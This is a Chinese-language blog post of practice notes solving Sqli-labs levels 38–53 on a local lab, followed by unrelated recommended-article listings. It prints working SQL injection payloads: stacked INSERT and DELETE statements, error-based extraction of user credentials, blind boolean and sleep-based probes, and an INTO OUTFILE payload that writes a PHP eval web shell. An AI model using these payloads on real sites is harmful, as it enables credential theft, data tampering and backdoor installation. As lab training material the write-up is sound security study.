Sqli-labs 堆叠注入篇 (Less38~53)

最新推荐文章于 2024-04-03 21:12:11 发布
最新推荐文章于 2024-04-03 21:12:11 发布
阅读量1.3k 收藏 10
点赞数 2
分类专栏: Sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angry_program/article/details/104309945
版权

目录

 

 

前言

Less-38   字符型堆叠注入

Less-39  整数型堆叠注入

Less-40  字符型堆叠盲注 

Less-41  整数型堆叠盲注

Less-42  字符型堆叠POST注入

Less-43   字符型堆叠POST变形注入

Less-44  字符型堆叠POST盲注

Less-45  字符型堆叠POST变形盲注

Less-46  Order By整数型显错注入

Less-47  Order By字符型显错注入

Less-48  Order By整数型盲注

Less-49  Order By字符型盲注

Less-50  Order By整数型显错堆叠注入

Less-51  Order By字符型显错堆叠注入

Less-52  Order By整数型堆叠盲注

Less-53  Order By字符型堆叠盲注

 

前言

本blog作为练习笔记,  文笔不才, 仅供参考, 不正之处望大神指正。

堆叠注入篇对应labs的38~53关:

 

 

 

Less-38   字符型堆叠注入

 虽然用很常规的方法都可以注入成功,  但是并不侧重于注入爆数据; 而是考察堆叠注入:

http://localhost:2333/Less-38/index.php
?id=0' union select 1,user(),database(); insert into users(username,password) values('stack', 'stack')%23

发现第二条语句成功执行了。

  • 堆叠注入

堆叠注入(Stacked injections), 从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。

  • 形成原理

看看源码:

总的来说就是mysqli_mylti_query()这个函数可以执行用;分隔的多条语句。
 

 

 

Less-39  整数型堆叠注入

这关和上一关一样了,  只不过这关是整数型,  给出payload:

http://localhost:2333/Less-39/index.php
?id=0 union select 1,user(),database(); insert into users(username,password) values('stack', 'stack')

 

 

 

Less-40  字符型堆叠盲注 

判断得知为字符型盲注,  可用布尔盲注或者延时盲注。

然后判断字段数,  发现order by不成立:

SELECT * FROM users WHERE id=('1' and '1'='1')

后来发现id值还被( )闭合住:

那为什么判断字符型时候的语句:  id=1' and '1'='1 又成立呢?

我们把语句带入SQL语句中就变成:

SELECT * FROM users WHERE id=('1' and '1'='1')

然后注入得字段数为3

我们用布尔盲注爆数据库长度,  下面是payload:

http://localhost:2333/Less-40/index.php?id=1') and length(database())=8 %23

然后剩下的爆库爆表等操作就不再复述了,  之前的博客都有介绍。

(ps:  这里可以使id=0引导成显错注入)

这里继续加入堆叠注入, 比如删除数据库的stack用户: (前提是爆出了表名和用户名)

http://localhost:2333/Less-40/index.php
?id=1') and length(database())=8; delete from users where username='stack';

然后看到stack用户消失:

 

 

 

Less-41  整数型堆叠盲注

这关和上一关一样,  只不过这关是整数型注入:

然后是payload:

http://localhost:2333/Less-41/index.php
?id=1 and length(database())=8; insert into users(username,password) values('stack','stack');

 

 

 

Less-42  字符型堆叠POST注入

这关和 Less-24 二次注入界面 差不多。

开始先判断注入点是否存在于用户名:

然后不管怎么注入都是:

于是判断注入点是否存在于密码:

注入一个单引号 (用户名随意):

报错成功,  password的内容应该是被单引号闭合住,

由此猜测登录的SQL语句为:

SELECT * FROM users WHERE username='$username' and password='$password'

于是可以将password部分的闭合掉,  再加入堆叠注入:

hack'; DELETE FROM users WHERE username='stack';#

成功执行删除语句。

 

 

 

Less-43   字符型堆叠POST变形注入

和上一关大同小异,  不同的是在password处被( )闭合:

首先注入单引号:

可以看到,  有括号闭合,  那么和上一关的payload差不多:

hack'); INSERT INTO users(username,password) values('stack','stack');#

 

 

 

Less-44  字符型堆叠POST盲注

这关也差不多,  除了没有报错信息,其他的没有变化。
当 POST 没有报错回显时,判断查询语句就需要构造永真条件同化登录失败与查询出错,通过返回的图片不同来确定是否符合查询语句闭合的条件。(盲注条件下)

接下来尝试: ( or 语句)

hack" or 1=1#

hack' or 1=1#

hack') or 1=1#

hack") or 1=1#

最后得知为单引号注入: hack' or 1=1#

堆叠注入:

hack'; DELETE FROM users WHERE username='stack';#

执行成功。

 

 

 

Less-45  字符型堆叠POST变形盲注

和上一关一样,  判断构造or语句判断类型的时候,  判断得知为:  hack') or 1=1#

堆叠注入payload:

hack'); INSERT INTO users(username,password) values('stack','stack');#

 

 

 

Less-46  Order By整数型显错注入

接下来几关都是关于order by的注入,  观察一下页面, 

它是根据传入的sort参数来对查询结果排序:

我们尝试对sort参数值注入:

http://localhost:2333/Less-46/index.php?sort=1 and 1=1  (整数型注入)

http://localhost:2333/Less-46/index.php?sort=1' and 1=1# (字符型注入)

http://localhost:2333/Less-46/index.php?sort=(select 2)

最后发现三种情况都无法成立。

这里有两种方法注入:

  • 显错注入

这就和Less-17 updatexml() 显错注入 很神似了。

http://localhost:2333/Less-46/index.php?sort=1 and updatexml(1,concat(0x7e,(database()),0x7e),0)

(0x7e是~的Hex编码) 

然后爆表就是同理可得了:

http://localhost:2333/Less-46/index.php
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

爆users表的字段:

http://localhost:2333/Less-46/index.php
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)

爆数据:

http://localhost:2333/Less-46/index.php
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users limit 0,1),0x7e),1)

  • 拓展

有了注入点,  我们可以尝试写webshell后门了, 

在  Less-7 文件写入注入 有介绍

利用 into outfile  将一句话写入:   

http://localhost:2333/Less-46/index.php
?sort=1 into outfile "./shell.php" lines terminated by 0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

其中,   ?php eval($_POST["cmd"]);?>的Hex编码就是0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

执行成功,  看看有没有写入文件:

然后用菜刀连接即可。

 

 

 

Less-47  Order By字符型显错注入

这关和上一关差不多,  区别就在于是字符型注入,  多了单引号闭合:

下面给payload:

http://localhost:2333/Less-47/index.php?sort=1'  and updatexml(1,concat(0x7e,(database()),0x7e),0)%23

其他就和Less-46大同小异,  不再赘述。

 

 

 

Less-48  Order By整数型盲注

这关我们发现没有错误信息回显:

只能通过页面是否正确来判断注入的sql是否被执行。(大多的网站也是这种类型,  有的是直接跳转到指定的错误界面, 也是一样的原理)

既然没有了报错注入, 这里可以用布尔注入或者延时注入,  要利用if()函数和rand()函数

  • 布尔注入

常规的布尔注入在这关并不被接受,  所以这里引入rand()函数:

rand(N) 函数

返回一个0.0~1.0内的随机浮点型数值。

取0~10 (不包括10)的随机浮点值写法:  rand() * 10

取5~10的写法: 5 + rand() * 10

当要取整数的时候,  就要用floor函数来取(下)整。

此外,  当N被指定时,  它将被用作种子值,  每个种子产生的随机数序列是不同的。

那么这里就可以用rand(true|false)来布尔注入了:

当rand(true)时的排序:

当rand(false)时的排序:

然后就可以进行布尔注入了, 比如判断当前数据库长度:

http://localhost:2333/Less-48/index.php?sort=rand(length(database())=8)

这时候就是true时候的排序结果了: 

同理,  接下来的爆表爆字段操作就不再赘述。

  • 延时注入

首先我们先了解order by 语句后面是否给接sleep()函数:

是可以加sleep()函数的,  但是sleep(1)为什么延迟了18秒??

可能是因为order by的排序方法可能是对每一行数据排序都调用一个and后面语句来判断是否成立,  导致了重复地执行sleep(1)。

那么根据这个原理,  注入点就很容易找到了:

http://localhost:2333/Less-48/index.php?sort=1 and sleep(if((1=1),0,1))

然后爆库的操作就是在if中修改布尔判断条件,  和上面的布尔注入是一样的。

当然,  也可以用into outfile来写webshell。

 

 

 

Less-49  Order By字符型盲注

这关和上一关的区别在于这关是字符型,  id值被单引号闭合住:

正因如此,  上一关的布尔rand()注入就用不了,  但是可以用延时注入:

下面是爆数据库长度的payload:

http://localhost:2333/Less-49/index.php?sort=1' and sleep(if((length(database())=8),0,1))%23

剩下的就如出一辙了。

 

 

 

Less-50  Order By整数型显错堆叠注入

这关和 Less-46 一样,  只不过这里可以进行堆叠注入执行多条语句:

在源码中可以看到用了 mysqli_multi_query() 函数:

extractvalue() 报错注入+堆叠注入:

http://localhost:2333/Less-50/index.php
?sort=1 and extractvalue(1,concat(0x7e,(database()),0x7e));  insert into users(username,password) values('stack','stack');

 

 

 

Less-51  Order By字符型显错堆叠注入

多了一对单引号闭合:

http://localhost:2333/Less-51/index.php
?sort=1' and extractvalue(1,concat(0x7e,(database()),0x7e));  delete from users where username='stack'; %23

注意,  这里不会执行第二句delete,  因为在extractvalue() 的时候,  已经引发报错了,  导致接下来的堆叠注入不得以执行。

正确:

http://localhost:2333/Less-51/index.php
?sort=1' ;  delete from users where username='stack'; %23

 

 

 

Less-52  Order By整数型堆叠盲注

和 Less-48 一样,  可以用布尔盲注或者延时注入:

  • 布尔盲注+堆叠注入:
http://localhost:2333/Less-52/index.php
?sort=rand(length(database())=8);  insert into users(username,password) values('stack','stack');

  • 延时注入+堆叠注入:
http://localhost:2333/Less-52/index.php
?sort=1 and sleep(if((length(database())=8),0,1));  insert into users(username,password) values('stack','stack');

 

 

 

Less-53  Order By字符型堆叠盲注

只不过多了一对单引号闭合,  绕开闭合即可:  (这里布尔盲注失效  用延时注入)

 

  • 延时注入+堆叠注入:
http://localhost:2333/Less-53/index.php
?sort=1' and sleep(if((length(database())=7),0,1));  delete from users where username='stack'; %23

 

angry_program
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Sqli-Labs靶场的SQL注入-38~45关
Joker
01-11 806
这一博客我主要讲了堆叠注入,包括堆叠注入原理、注入条件、注入方法等。堆叠注入的前提条件多,可以实际应用的场景较少。但是只要能够进行堆叠注入,就可以对后台数据库造成很大的伤害。
sqlilabs靶场为例,讲解SQL注入攻击原理【42-53关】
weixin_42515203的博客
06-05 635
sqlilabs靶场为例,讲解SQL注入攻击原理【42-53关】
sqli-labs通关攻略教程——堆叠注入+排序注入(less38~less65)
m0_55854679的博客
08-15 791
文章目录less 38方法1——报错注入联合注入堆叠注入less 39less 40联合注入堆叠注入less 41less 42报错注入堆叠注入less 43less 44less 45less 46报错注入时间盲注less 47less 48less 49less 50堆叠注入报错注入less 51less 52less 53less 54less 55less 56less 57less 58less 59less 60less 61less 62less 63less 64less 65 less 3
sqli-labs通关全解----堆叠注入---38~45---11
cyynid的博客
01-13 456
本文引入一个新的概念:堆叠注入Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在;结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 779
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
SQLi Labs Less-38 堆叠注入
wangyuxiang946的博客
06-22 1万+
第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式 ?id=1' and false-- a SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下 本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入 第二步,判断字段数 使用order by 排序 测试字段数量 ?id=1' order by 4 -- a 从第1列开始测试 , 直至报错 , 第4列开始异...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sql_labsqli中的堆叠注入(less-38
qq_59020256的博客
12-23 729
id=1' order by 3 -- s 有回显。id=1' order by 4 -- s 报错。id=1' and 1=2 -- s 没有回显。id=1' and 1=1 -- s 有回显。接下来的步骤可以用联合查询进行查询。(1)在users表中添加一个用户。堆叠注入(less-38
sqli-labs(宽字节less-33,二次less-24,update less-17,堆叠less-38)pikachu(insert,delete)
weixin_74182283的博客
04-03 686
堆叠注入可以执行的是任意的语句。x' or updatexml(1,concat(0x7e,version(),0x7e),1) or '1‘=’1 填入两个必填的字段ps(or前面的那个x可写可不写,只是用来装作一个用户,让前面闭合的语句为假而已,我就没写,别想太多。也先瞅眼代码◕‿◕,可以看到这里也进行了相关的过滤,比如这个substr 意味着如果使用substr只能截取0-15个的字符,后面这个strip是过滤了\,来防止一些转义字符的替换,下面那个就是上面宽字节的函数,也进行了限制。
(手工)【sqli-labs40、41】堆叠注入、盲注
07-15 1613
SQL-堆叠、盲注】
基于SpringCloud微服务架构的B2C电子商务系统-可执行内含文档代码-可执行内含文档代码.zip
07-28
基于SpringCloud微服务架构的B2C电子商务系统-可执行内含文档代码-可执行内含文档代码.zip
智慧校园整体解决方案-6PPT(102页).pptx
07-28
智慧校园整体解决方案是响应国家教育信息化政策,结合教育改革和技术创新的产物。该方案以物联网、大数据、人工智能和移动互联技术为基础,旨在打造一个安全、高效、互动且环保的教育环境。方案强调从数字化校园向智慧校园的转变,通过自动数据采集、智能分析和按需服务,实现校园业务的智能化管理。 方案的总体设计原则包括应用至上、分层设计和互联互通,确保系统能够满足不同用户角色的需求,并实现数据和资源的整合与共享。框架设计涵盖了校园安全、管理、教学、环境等多个方面,构建了一个全面的校园应用生态系统。这包括智慧安全系统、校园身份识别、智能排课及选课系统、智慧学习系统、精品录播教室方案等,以支持个性化学习和教学评估。 建设内容突出了智慧安全和智慧管理的重要性。智慧安全管理通过分布式录播系统和紧急预案一键启动功能,增强校园安全预警和事件响应能力。智慧管理系统则利用物联网技术,实现人员和设备的智能管理,提高校园运营效率。 智慧教学部分,方案提供了智慧学习系统和精品录播教室方案,支持专业级学习硬件和智能化网络管理,促进个性化学习和教学资源的高效利用。同时,教学质量评估中心和资源应用平台的建设,旨在提升教学评估的科学性和教育资源的共享性。 智慧环境建设则侧重于基于物联网的设备管理,通过智慧教室管理系统实现教室环境的智能控制和能效管理,打造绿色、节能的校园环境。电子班牌和校园信息发布系统的建设,将作为智慧校园的核心和入口,提供教务、一卡通、图书馆等系统的集成信息。 总体而言,智慧校园整体解决方案通过集成先进技术,不仅提升了校园的信息化水平,而且优化了教学和管理流程,为学生、教师和家长提供了更加便捷、个性化的教育体验。
anaconda配置pytorch环境.pdf
最新发布
07-28
使用Anaconda配置PyTorch环境是一个相对直接的过程,以下是一个详细的步骤指南,包括Anaconda的下载与安装、PyTorch环境的创建以及PyTorch的安装与验证。 一、Anaconda的下载与安装 1.访问Anaconda官网: 1.前往Anaconda官网下载最新版本的Anaconda。 2.下载Anaconda: 1.在官网首页,点击“Free Download”按钮,选择合适的操作系统版本进行下载。 3.安装Anaconda: 1.双击下载好的Anaconda安装包,按照提示进行安装。 2.注意选择安装路径(建议不安装在C盘),并确保安装路径为全英文。 3.安装过程中,根据需要选择“为所有用户安装”或“仅为当前用户安装”。 4.验证Anaconda安装: 1.安装完成后,打开“Anaconda Prompt”(或Anaconda Navigator),输入conda --version查看conda版本,以验证Anaconda是否安装成功。 二、创建PyTorch环境 1.打开Anaconda Prompt: 1.在开始菜单中找到并打开“Anaconda Pro
2024小米SOC面试经验
07-28
• 自我介绍,然后针对项目实习进行提问。 • sdram仲裁模块设计:面试官询问了我关于sdram(同步动态随机存取存储器)仲裁模块的设计思路,这可能涉及到如何高效地管理多个设备或进程对sdram的访问,确保数据一致性和性能优化。 • FIFO设计:我们探讨了FIFO(先进先出队列)是否使用了现成的IP核(知识产权核),并假设如果我自己设计FIFO时可能遇到的难点,如同步问题、缓冲区管理、性能优化等。 • 跨时钟域问题:讨论了跨时钟域信号同步的挑战,特别是信号展宽(metastability)的解决策略,这是确保数据在不同时钟域间可靠传输的关键。 • TMDS编码流程:面试官询问了我TMDS(Transition Minimized Differential Signaling,转换最小化差分信号)编码的具体流程,这通常涉及视频或高速数据传输领域,要求我对数据传输协议有深入理解。 • 项目调试方法:面试官要求我分享在项目中如何进行调试的经验,包括使用的工具、调试策略及问题解决过程。
1920x1080尺寸的NV12 YUV的图像数据
07-28
1920x1080尺寸的NV12 YUV的图像数据
步行街招商计划书范本(附租赁合同等).doc
07-28
商业计划书,创业计划书,项目计划书,计划书模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
考勤表模板---自动计算.xlsx
07-28
考勤表,Excel模版
【2021】2021年数字化汽车报告- 洞察全球移动出行市场(首)-PWC_44页.pdf
07-28
【2021】2021年数字化汽车报告- 洞察全球移动出行市场(首)-PWC_44页.pdf
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个关于SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中,我们尝试闭合单引号来看是否存在注入点。在第二步中,我们尝试使用恶意的union select语句来获取数据库中的信息。在这个例子中,我们使用了"-2") union select 1,2,3 --"作为注入代码。通过这个注入代码,我们可以判断当前数据库的一些信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值